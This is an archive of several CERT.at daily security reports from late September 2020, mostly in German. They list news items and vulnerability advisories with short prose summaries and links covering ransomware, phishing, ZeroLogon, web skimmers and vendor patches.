===================== = End-of-Day report = ===================== Timeframe: Mittwoch 30-09-2020 18:00 − Donnerstag 01-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Über die Verantwortung, die mit guter JavaScript-Unterstützung einhergeht ∗∗∗ --------------------------------------------- Warum Websites und Apps nicht zwangsläufig "ohne JavaScript funktionieren" müssen - aber sie und wir JavaScript verantwortungsvoller verwenden könnten. --------------------------------------------- https://heise.de/-4907606 ∗∗∗ Keine WhatsApp-Nachrichten für Emojis und Smileys teilen! ∗∗∗ --------------------------------------------- Gehäuft werden WhatsApp-Nachrichten von Kriminellen verschickt, die kostenlose Angebote bewerben und zur weiteren Verbreitung auffordern. Derzeit kursiert eine Betrugsnachricht, die neue Emojis für WhatsApp verspricht, wenn sie 20 mal geteilt wird. Die Nachricht ist fake und führt zu weiteren unseriösen Angeboten. --------------------------------------------- https://www.watchlist-internet.at/news/keine-whatsapp-nachrichten-fuer-emoj… ∗∗∗ Phishing mit Captchas ∗∗∗ --------------------------------------------- Eine Flut von Phishing-E-Mails mit dem Ziel Microsoft Office 365 setzt Captchas ein, um die Opfer in ein Gefühl der Sicherheit zu wiegen. --------------------------------------------- https://www.zdnet.de/88383103/phishing-mit-captchas/ ∗∗∗ IOCs turning into IOOIs, (Thu, Oct 1st) ∗∗∗ --------------------------------------------- Remember, back in the days, when the anti-virus vendors looked with derision at some of their competition, exclaiming "But they are using just SIGNATURES. Our tool detects BEHAVIOURS". That was like 15 years ago. Fast forward to today, with many of the same vendors now selling "threat intelligence feeds" for good money, and the most frequent attributes pushed over these feeds are MD5/SHA1 hashes and IP addresses. The main thing that changed is that we now call these items [...] --------------------------------------------- https://isc.sans.edu/diary/rss/26624 ∗∗∗ Network Detection for ZeroLogon (CVE-2020-1472) ∗∗∗ --------------------------------------------- ZeroLogon has quickly become popular and well known because of multiple proofs of concept and exploits implemented in Python, .NET, Powershell, and Mimikatz implemented a module for it. So if you are an attacker or need to test your environment then you have plenty of options. As defenders, we also have options for detection on the network. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/network-det… ∗∗∗ Evasive URLs in Spam: Part 2 ∗∗∗ --------------------------------------------- A URL can be completely valid, yet still misleading. In this blog, we will present another technique with URLs that we observed in a recent malicious spam campaign. This is the continuation of an earlier blog that discussed how valid URL formats can be used in evading detection. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-url… ∗∗∗ Detecting Microsoft 365 and Azure Active Directory Backdoors ∗∗∗ --------------------------------------------- Mandiant has seen an uptick in incidents involving Microsoft 365 (M365) and Azure Active Directory (Azure AD). Most of these incidents are the result of a phishing email coercing a user to enter their credentials used for accessing M365 into a phishing site. Other incidents have been a result of password spraying, password stuffing, or simple brute force attempts against M365 tenants. In almost all of these incidents, the user or account was not protected by multi-factor authentication (MFA). --------------------------------------------- http://www.fireeye.com/blog/threat-research/2020/09/detecting-microsoft-365… ∗∗∗ Three immediate steps to take to protect your APIs from security risks ∗∗∗ --------------------------------------------- In one form or another, APIs have been around for years, bringing the benefits of ease of use, efficiency and flexibility to the developer community. The advantage of using APIs for mobile and web apps is that developers can build and deploy functionality and data integrations quickly. API security posture But there is a huge downside to this approach. --------------------------------------------- https://www.helpnetsecurity.com/2020/10/01/api-security-posture/ ∗∗∗ A complete stranger controlled this woman’s home security system, but they’re not the one she’s angry with ∗∗∗ --------------------------------------------- Imagine being contacted by a complete stranger via Facebook, and them telling you that they have complete control over the security system in your new home. --------------------------------------------- https://www.bitdefender.com/box/blog/iot-news/complete-stranger-controlled-… ∗∗∗ IPStorm botnet expands from Windows to Android, Mac, and Linux ∗∗∗ --------------------------------------------- IPStorm botnet quadruples in size to reach 13,500 infected systems. --------------------------------------------- https://www.zdnet.com/article/ipstorm-botnet-expands-from-windows-to-androi… ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Flaws Discovered in Popular Industrial Remote Access Systems ∗∗∗ --------------------------------------------- Cybersecurity researchers have found critical security flaws in two popular industrial remote access systems that can be exploited to ban access to industrial production floors, hack into company networks, tamper with data, and even steal sensitive business secrets. The flaws, discovered by Tel Aviv-based OTORIO, were identified in B&R Automations SiteManager and GateManager, and MB Connect [...] --------------------------------------------- https://thehackernews.com/2020/10/industrial-remote-access.html ∗∗∗ Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow ∗∗∗ --------------------------------------------- The vulnerability is caused due to a boundary error in the processing of received FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited to cause a stack-based buffer overflow when a user issues a POST request to connect to a malicious FTP server. Successful exploitation could allow execution of arbitrary code on the affected device or cause denial of service scenario. --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php ∗∗∗ Vulnerability Spotlight: Remote code execution bugs in NVIDIA D3D10 driver ∗∗∗ --------------------------------------------- Cisco Talos recently discovered multiple remote code execution vulnerabilities in the NVIDIA D3D10 driver. This driver supports multiple GPUs that NVIDIA produces. An adversary could exploit these vulnerabilities by supplying the user with a malformed shader, eventually allowing them to execute code on the victim machine. These bugs could also allow the attacker to perform a guest-to-host escape through Hyper-V [...] --------------------------------------------- https://blog.talosintelligence.com/2020/09/vuln-spotlight-nvidia-d3d10-.html ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ruby-json-jwt and ruby-rack-cors), Fedora (xen), SUSE (aspell and tar), and Ubuntu (ruby-gon, ruby-kramdown, and ruby-rack). --------------------------------------------- https://lwn.net/Articles/833191/ ∗∗∗ Broken access control in Platinum Mobile ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/broken-access-control-in-plati… ∗∗∗ Red Hat OpenShift: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0946 ∗∗∗ Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (CVE-2020-13935) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-open-source-apache-tomcat… ∗∗∗ Security Bulletin: IBM Cloud Pak System is affected by a vulnerability in VMware component ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-system-is-a… ∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affect IBM Netcool Agile Service Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is affected by multiple Node.js vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: A vulnerability in Netty affects IBM Netcool Agile Service Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-netty-… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information disclosure vulnerability (CVE-2020-4576) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec Affects IBM Sterling Secure Proxy ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.09.2020
by Daily end-of-shift report 30 Sep '20

30 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 29-09-2020 18:00 − Mittwoch 30-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Fake software crack sites used to push Exorcist 2.0 Ransomware ∗∗∗ --------------------------------------------- The threat actors behind the Exorcist 2.0 ransomware are using malicious advertising to redirect victims to fake software crack sites that distribute their malware. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fake-software-crack-sites-us… ∗∗∗ Over 247K Exchange servers unpatched for actively exploited flaw ∗∗∗ --------------------------------------------- More than 247,000 Microsoft Exchange servers are yet to be patched against the CVE-2020-0688 post-auth remote code execution (RCE) vulnerability impacting all Exchange Server versions under support. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-247k-exchange-servers-u… ∗∗∗ Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise ∗∗∗ --------------------------------------------- A new report from Microsoft shows it is clear that threat actors have rapidly increased in sophistication over the past year, using techniques that make them harder to identify. --------------------------------------------- https://www.microsoft.com/security/blog/2020/09/29/microsoft-digital-defens… ∗∗∗ Its 2020 so not only is your mouse config tool a Node.JS Electron app, its also pwnable by an evil webpage ∗∗∗ --------------------------------------------- Malicious JavaScript can inject commands to execute Earlier this year, peripheral maker Kensington patched its desktop software to close a vulnerability that could have been exploited by malicious websites to quietly hijack victims computers. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2020/09/30/kensingtonwo… ∗∗∗ LodaRAT Update: Alive and Well ∗∗∗ --------------------------------------------- By Chris Neal. During our continuous monitoring of LodaRAT, Cisco Talos observed changes in the threat that add new functionality. Multiple new versions of LodaRAT have been spotted being used in the wild. These new versions of LodaRAT abandoned their previous obfuscation techniques. Direct interaction with the threat actor was observed during analysis, indicating the actor is actively monitoring infected hosts. --------------------------------------------- https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.ht… ∗∗∗ Achtung! Vermeintliche Gutschein-Codes führen in Abo-Falle ∗∗∗ --------------------------------------------- Derzeit tauchen vermehrt gefälschte Gutschein-Codes für verschiedene Anbieter wie Netflix, Steam, Playstation, Google Play oder Amazon auf. Zu finden sind diese Codes in Kommentaren unter verschiedensten YouTube-Videos. Doch anstatt den versprochenen 50 Euro, tappen die Opfer in die Abo-Falle. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-vermeintliche-gutschein-code… ∗∗∗ This worm phishing campaign is a game-changer in password theft, account takeovers ∗∗∗ --------------------------------------------- The security incident highlights the need for multi-factor authentication in the enterprise. --------------------------------------------- https://www.zdnet.com/article/this-worm-phishing-campaign-is-a-game-changer… ===================== = Vulnerabilities = ===================== ∗∗∗ Jetzt patchen! Cisco liefert Sicherheitsupdates für Router nach ∗∗∗ --------------------------------------------- Admins sollten professionelle Router von Cisco aus Sicherheitsgründe auf den aktuellen Stand bringen. Angreifer nutzen die Lücken derzeit aus. --------------------------------------------- https://heise.de/-4916417 ∗∗∗ FYI: If youre running HP Device Manager, anyone on your network can get admin on your server via backdoor ∗∗∗ --------------------------------------------- Hidden database account discovered, patches finally available as well as mitigations HP Device Manager, software that allows IT administrators to manage HP Thin Client devices, comes with a backdoor database user account that undermines network security, a UK-based consultant has warned. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2020/09/30/hp_device_ma… ∗∗∗ Huawei Security Advisories ∗∗∗ --------------------------------------------- Huawei hat 16 Security Advisories für verschiedene Produkte veröffentlicht. --------------------------------------------- https://www.huawei.com/en/psirt/all-bulletins ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (chromium, firefox, libvirt, and podman), Debian (firefox-esr and nss), Gentoo (bitcoind, chromium, cifs-utils, gpsd, libuv, and xen), Mageia (firefox, gnutls, mediawiki, samba, and Thunderbird), openSUSE (brotli and cifs-utils), Red Hat (audiofile, bluez, cloud-init, cpio, cups, curl, dbus, dnsmasq, e2fsprogs, evince and poppler, exiv2, expat, firefox, fontforge, freeradius, freerdp, glib2 and ibus, glibc, httpd, hunspell, ipa, kernel, kernel-rt, [...] --------------------------------------------- https://lwn.net/Articles/833120/ ∗∗∗ Vulnerabilities in Bosch PRAESIDEO and PRAESENSA ∗∗∗ --------------------------------------------- BOSCH-SA-538331-BT: Two security vulnerabilities have been uncovered in the web based management interface of the PRAESIDEO Network Controller and the PRAESENSA System Controller. The vulnerabilities will allow a Cross-Site Request Forgery (CSRF) attack and a Cross-site Scripting (XSS) attack. For PRAESIDEO a third vulnerability will allow a replay attack with which authentication can be bypassed. This last vulnerability is present in the web server of the PRAESIDEO Network Controller. --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-538331-bt.html ∗∗∗ Advisory: Multiple Vulnerabilities in SiteManager and GateManager ∗∗∗ --------------------------------------------- https://www.br-automation.com/downloads_br_productcatalogue/assets/16000031… ∗∗∗ Advisory: Multiple Vulnerabilities in GateManager ∗∗∗ --------------------------------------------- https://www.br-automation.com/downloads_br_productcatalogue/assets/16000031… ∗∗∗ Red Hat Enterprise Linux: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0939 ∗∗∗ Red Hat Enterprise Linux: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0940 ∗∗∗ Red Hat Enterprise Linux/FreeRDP: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0941 ∗∗∗ Red Hat Enterprise Linux/WebKitGTK: Mehrere Schwachstellen ermöglichen Ausführen von beliebigem Programmcode mit Benutzerrechten ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0942 ∗∗∗ Security Bulletin: Security vulnerability in WebSphere Liberty Server shipped with IBM Global Mailbox (CVE-2020-4329) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-in… ∗∗∗ Security Bulletin: Version 5.0.5 of Redis included in IBM Netcool Operations Insight 1.6.1.x has a security vulnerability (CVE-2020-14147) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-version-5-0-5-of-redis-in… ∗∗∗ Security Bulletin: Vulnerabilities in WebSphere Application Server affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-websph… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM® SDK, Java™ Technology Edition may affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in middleware software affect IBM Cloud Pak for Automation ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information exposure vulnerability (CVE-2020-4629) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: Version 4.17.15 of Node.js module lodash included in IBM Netcool Operations Insight 1.6.1.x has a security vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-version-4-17-15-of-node-j… ∗∗∗ Security Bulletin: IBM Tivoli Netcool Impact is affected by an Apache Commons Codec vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tivoli-netcool-impact… ∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec affects IBM Operations Analytics Predictive Insights ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c… ∗∗∗ Security Bulletin: IBM Cloud Manager with OpenStack is affected by a OpenSSL vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-manager-with-op… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.09.2020
by Daily end-of-shift report 29 Sep '20

29 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Montag 28-09-2020 18:00 − Dienstag 29-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 ∗∗∗ --------------------------------------------- The Netlogon Remote Protocol (also called MS-NRPC) is an RPC interface that is used exclusively by domain-joined devices. MS-NRPC includes an authentication method and a method of establishing a Netlogon secure channel. These updates enforce the specified Netlogon client behavior to use secure RPC with Netlogon secure channel between member computers and Active Directory (AD) domain controllers (DC). This security update addresses the vulnerability by enforcing secure RPC when using the [...] --------------------------------------------- https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-… ∗∗∗ Windows 10 is offering a confusing mess of Intel driver updates ∗∗∗ --------------------------------------------- Windows 10 2004 is offering optional updates for Intel drivers that are a confusing mess for users who attempt to install them. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-10-is-offering-a-co… ∗∗∗ Backdoor Obfuscation: tempnam & URL Encoding ∗∗∗ --------------------------------------------- In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code. During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host. This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL encoded format and assigned to the variable $i: [...] --------------------------------------------- https://blog.sucuri.net/2020/09/backdoor-obfuscation-tempnam-url-encoding.h… ∗∗∗ [SANS ISC] Managing Remote Access for Partners & Contractors ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: "Managing Remote Access for Partners & Contractors": Yesterday, I wrote a quick diary about a potential security issue that some Tyler customers faced. Some people reacted to my diary with interesting comments in our forums. Two of them were interesting and deserve some [...] --------------------------------------------- https://blog.rootshell.be/2020/09/29/sans-isc-managing-remote-access-for-pa… ∗∗∗ Cloud-y, with a chance of hacking all the wireless things ∗∗∗ --------------------------------------------- Grandstream are a provider of IP video and voice services, as well as Wi-Fi and other related services and equipment. Their products are sold in over 150 countries and they [...] --------------------------------------------- https://www.pentestpartners.com/security-blog/cloudy-with-a-chance-of-hacki… ∗∗∗ Playstation 5 nicht bei biogaming.de vorbestellen ∗∗∗ --------------------------------------------- Viele warten schon sehnsüchtig auf die neue Playstation 5. Um zum Verkaufsstart im November auch mit Sicherheit ein Modell zu ergattern, suchen KonsumentInnen nach Onlineshops, die noch eine Vorbestellung annehmen. Vorsicht ist jedoch geboten: Auch Fake-Shop bieten die Playstation 5 an! Wer beispielsweise bei biogaming.de bestellt, erhält trotz Bezahlung keine Ware. --------------------------------------------- https://www.watchlist-internet.at/news/playstation-5-nicht-bei-biogamingde-… ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Information Disclosure on WP Courses plugin exposes private course videos and materials ∗∗∗ --------------------------------------------- Today weve got an interesting story to share. A vulnerability in WP Courses caused our Java course to be publicly disclosed via the WordPress REST API. Let’s dive into the details and see what happened. --------------------------------------------- https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plug… ∗∗∗ Security-Updates für Windows-Versionen von Foxit Reader und PhantomPDF verfügbar ∗∗∗ --------------------------------------------- Das Foxit-Team hat Sicherheitslücken mit überwiegend hoher Risikoeinstufung aus Reader und PhantomPDF für Windows sowie aus dem 3D Plugin (Beta) beseitigt. --------------------------------------------- https://heise.de/-4915016 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr and mediawiki), openSUSE (firefox, libqt5-qtbase, and rubygem-actionpack-5_1), Red Hat (qemu-kvm, qemu-kvm-ma, and virt:rhel), SUSE (dpdk, firefox, and go1.15), and Ubuntu (dpdk, imagemagick, italc, libpgf, libuv1, pam-python, squid3, ssvnc, and teeworlds). --------------------------------------------- https://lwn.net/Articles/832958/ ∗∗∗ Trend Micro Security Produkte: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0938 ∗∗∗ Security Bulletin: IBM Security Verify Privilege Vault Remote is vulnerable to local user security bypass (CVE-2020-4607) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-verify-privi… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to (CVE-2020-8244) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to an infinite read loop (CVE-2020-16845) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM i ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to Kubernetes vulnerabilities (CVE-2020-8557, CVE-2020-8559) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to a regular expression infinite loop (NODE-SECURITY-1488) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: IBM Java SDK and IBM Java Runtime for IBM i is affected by CVE-2020-2590 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-and-ibm-java… ∗∗∗ Security Bulletin: Aspera on Cloud CVE-2020-8184 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-aspera-on-cloud-cve-2020-… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Kubernetes vulnerability (CVE-2020-8553) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: IBM Java SDK and IBM Java Runtime for IBM i is affected by CVE-2020-2601 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-and-ibm-java… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.09.2020
by Daily end-of-shift report 28 Sep '20

28 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 25-09-2020 18:00 − Montag 28-09-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Some Tyler Technologies Customers Targeted with The Installation of a Bomgar Client, (Mon, Sep 28th) ∗∗∗ --------------------------------------------- One of our readers, a Tyler Technologies's customer, reported to us that he found this morning the Bomgar client[1] (BeyondTrust) installed on one of his servers. There is an ongoing discussion on Reddit with the same kind of reports[2]. --------------------------------------------- https://isc.sans.edu/diary/rss/26610 ∗∗∗ Magento Credit Card Stealing Malware: gstaticapi ∗∗∗ --------------------------------------------- Our team recently came across a malicious script used on a Magento website titled gstaticapi, which targeted checkout processes to capture and exfiltrate stolen information. To obtain sensitive details, the malware loads external javascript whenever the URL contains “checkout” ⁠— this location typically belongs to the step in Magento’s checkout process where users enter their sensitive credit card information and shipping details. --------------------------------------------- https://blog.sucuri.net/2020/09/magento-credit-card-stealing-malware-gstati… ∗∗∗ Kostenloses Entschlüsselungstool für Erpressungstrojaner ThunderX ist da ∗∗∗ --------------------------------------------- Sicherheitsforscher haben einen Fehler in der Verschlüsselung durch die Ransomware ThunderX entdeckt und bieten nun Hilfe an. --------------------------------------------- https://heise.de/-4913470 ===================== = Vulnerabilities = ===================== ∗∗∗ Jetzt patchen! AgeLocker Ransomware hat es auf Qnap NAS abgesehen ∗∗∗ --------------------------------------------- Besitzer von Netzwerkspeichern (NAS) der Firma Qnap, sollten ihr Gerät aus Sicherheitsgründen auf den aktuellen Stand bringen. --------------------------------------------- https://heise.de/-4913513 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (curl, libdbi-perl, linux-4.19, lua5.3, mediawiki, nfdump, openssl1.0, qt4-x11, qtbase-opensource-src, ruby-gon, and yaws), Fedora (f2fs-tools, grub2, libxml2, perl-DBI, singularity, xawtv, and xen), Mageia (cifs-utils, kio-extras, libproxy, mbedtls, nodejs, novnc, and pdns), openSUSE (bcm43xx-firmware, chromium, conmon, fuse-overlayfs, libcontainers-common, podman, firefox, libqt4, libqt5-qtbase, openldap2, ovmf, pdns, rubygem-actionpack-5_1, and [...] --------------------------------------------- https://lwn.net/Articles/832831/ ∗∗∗ MediaWiki: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein lokaler Angreifer kann mehrere Schwachstellen in MediaWiki ausnutzen, um beliebigen Programmcode mit Benutzerrechten auszuführen, einen Cross-Site Scripting Angriff durchzuführen, Daten zu manipulieren oder weitere Angriffe mit nicht spezifizierten Auswirkungen durchzuführen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0923 ∗∗∗ MediaWiki: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in MediaWiki ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen oder Sicherheitsvorkehrungen zu umgehen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0934 ∗∗∗ Trend Micro Apex One: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein lokaler Angreifer kann mehrere Schwachstellen in Trend Micro Apex One ausnutzen, um seine Privilegien zu erhöhen, Code zur Ausführung zu bringen und Informationen offenzulegen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0925 ∗∗∗ F5 BIG-IP: Schwachstelle ermöglicht Denial of Service ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann eine Schwachstelle in F5 BIG-IP ausnutzen, um einen Denial of Service Angriff durchzuführen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0927 ∗∗∗ Security Advisory - Buffer Overflow Vulnerability BootHole in GRUB2 Secure Boot ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200923-… ∗∗∗ Security Bulletin: Insecure Use of InnerHTML or OuterHTML in IBM Enterprise Records ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-insecure-use-of-innerhtml… ∗∗∗ Security Bulletin: Dynamically constructed href attribute in IBM Enterprise Records ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-dynamically-constructed-h… ∗∗∗ Security Bulletin: Apache Commons Codec Vulnerability Affects IBM Control Center ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-commons-codec-vuln… ∗∗∗ Security Bulletin: Multiple Java Vulnerabilities Impact IBM Control Center ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-java-vulnerabili… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Node.js lodash vulnerability (CVEID: 183560) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Private – OpenSSL (CVE-2019-1563, CVE-2019-1549, CVE-2019-1547) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Event Streams is affected by a Node.js http-proxy and lodash module vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: IBM Event Streams is affected by a vulnerability in the Go runtime (CVE-2020-16845) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: IBM Event Streams is affected by a Redis vulnerability (CVE-2020-14147) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-event-streams-is-affe… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to an Elasticsearch vulnerability (CVE-2019-7614) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from OpenSSH affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Netty vulnerability (CVE-2020-11612) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: A Security Vulnerability affects IBM Cloud Private – Logstash (CVE-2019-7620) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.12.0 ESR + CVE-2020-15664) hava affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.12.0 ESR + CVE-2020-15659) have affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.12.0 ESR) hava affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… 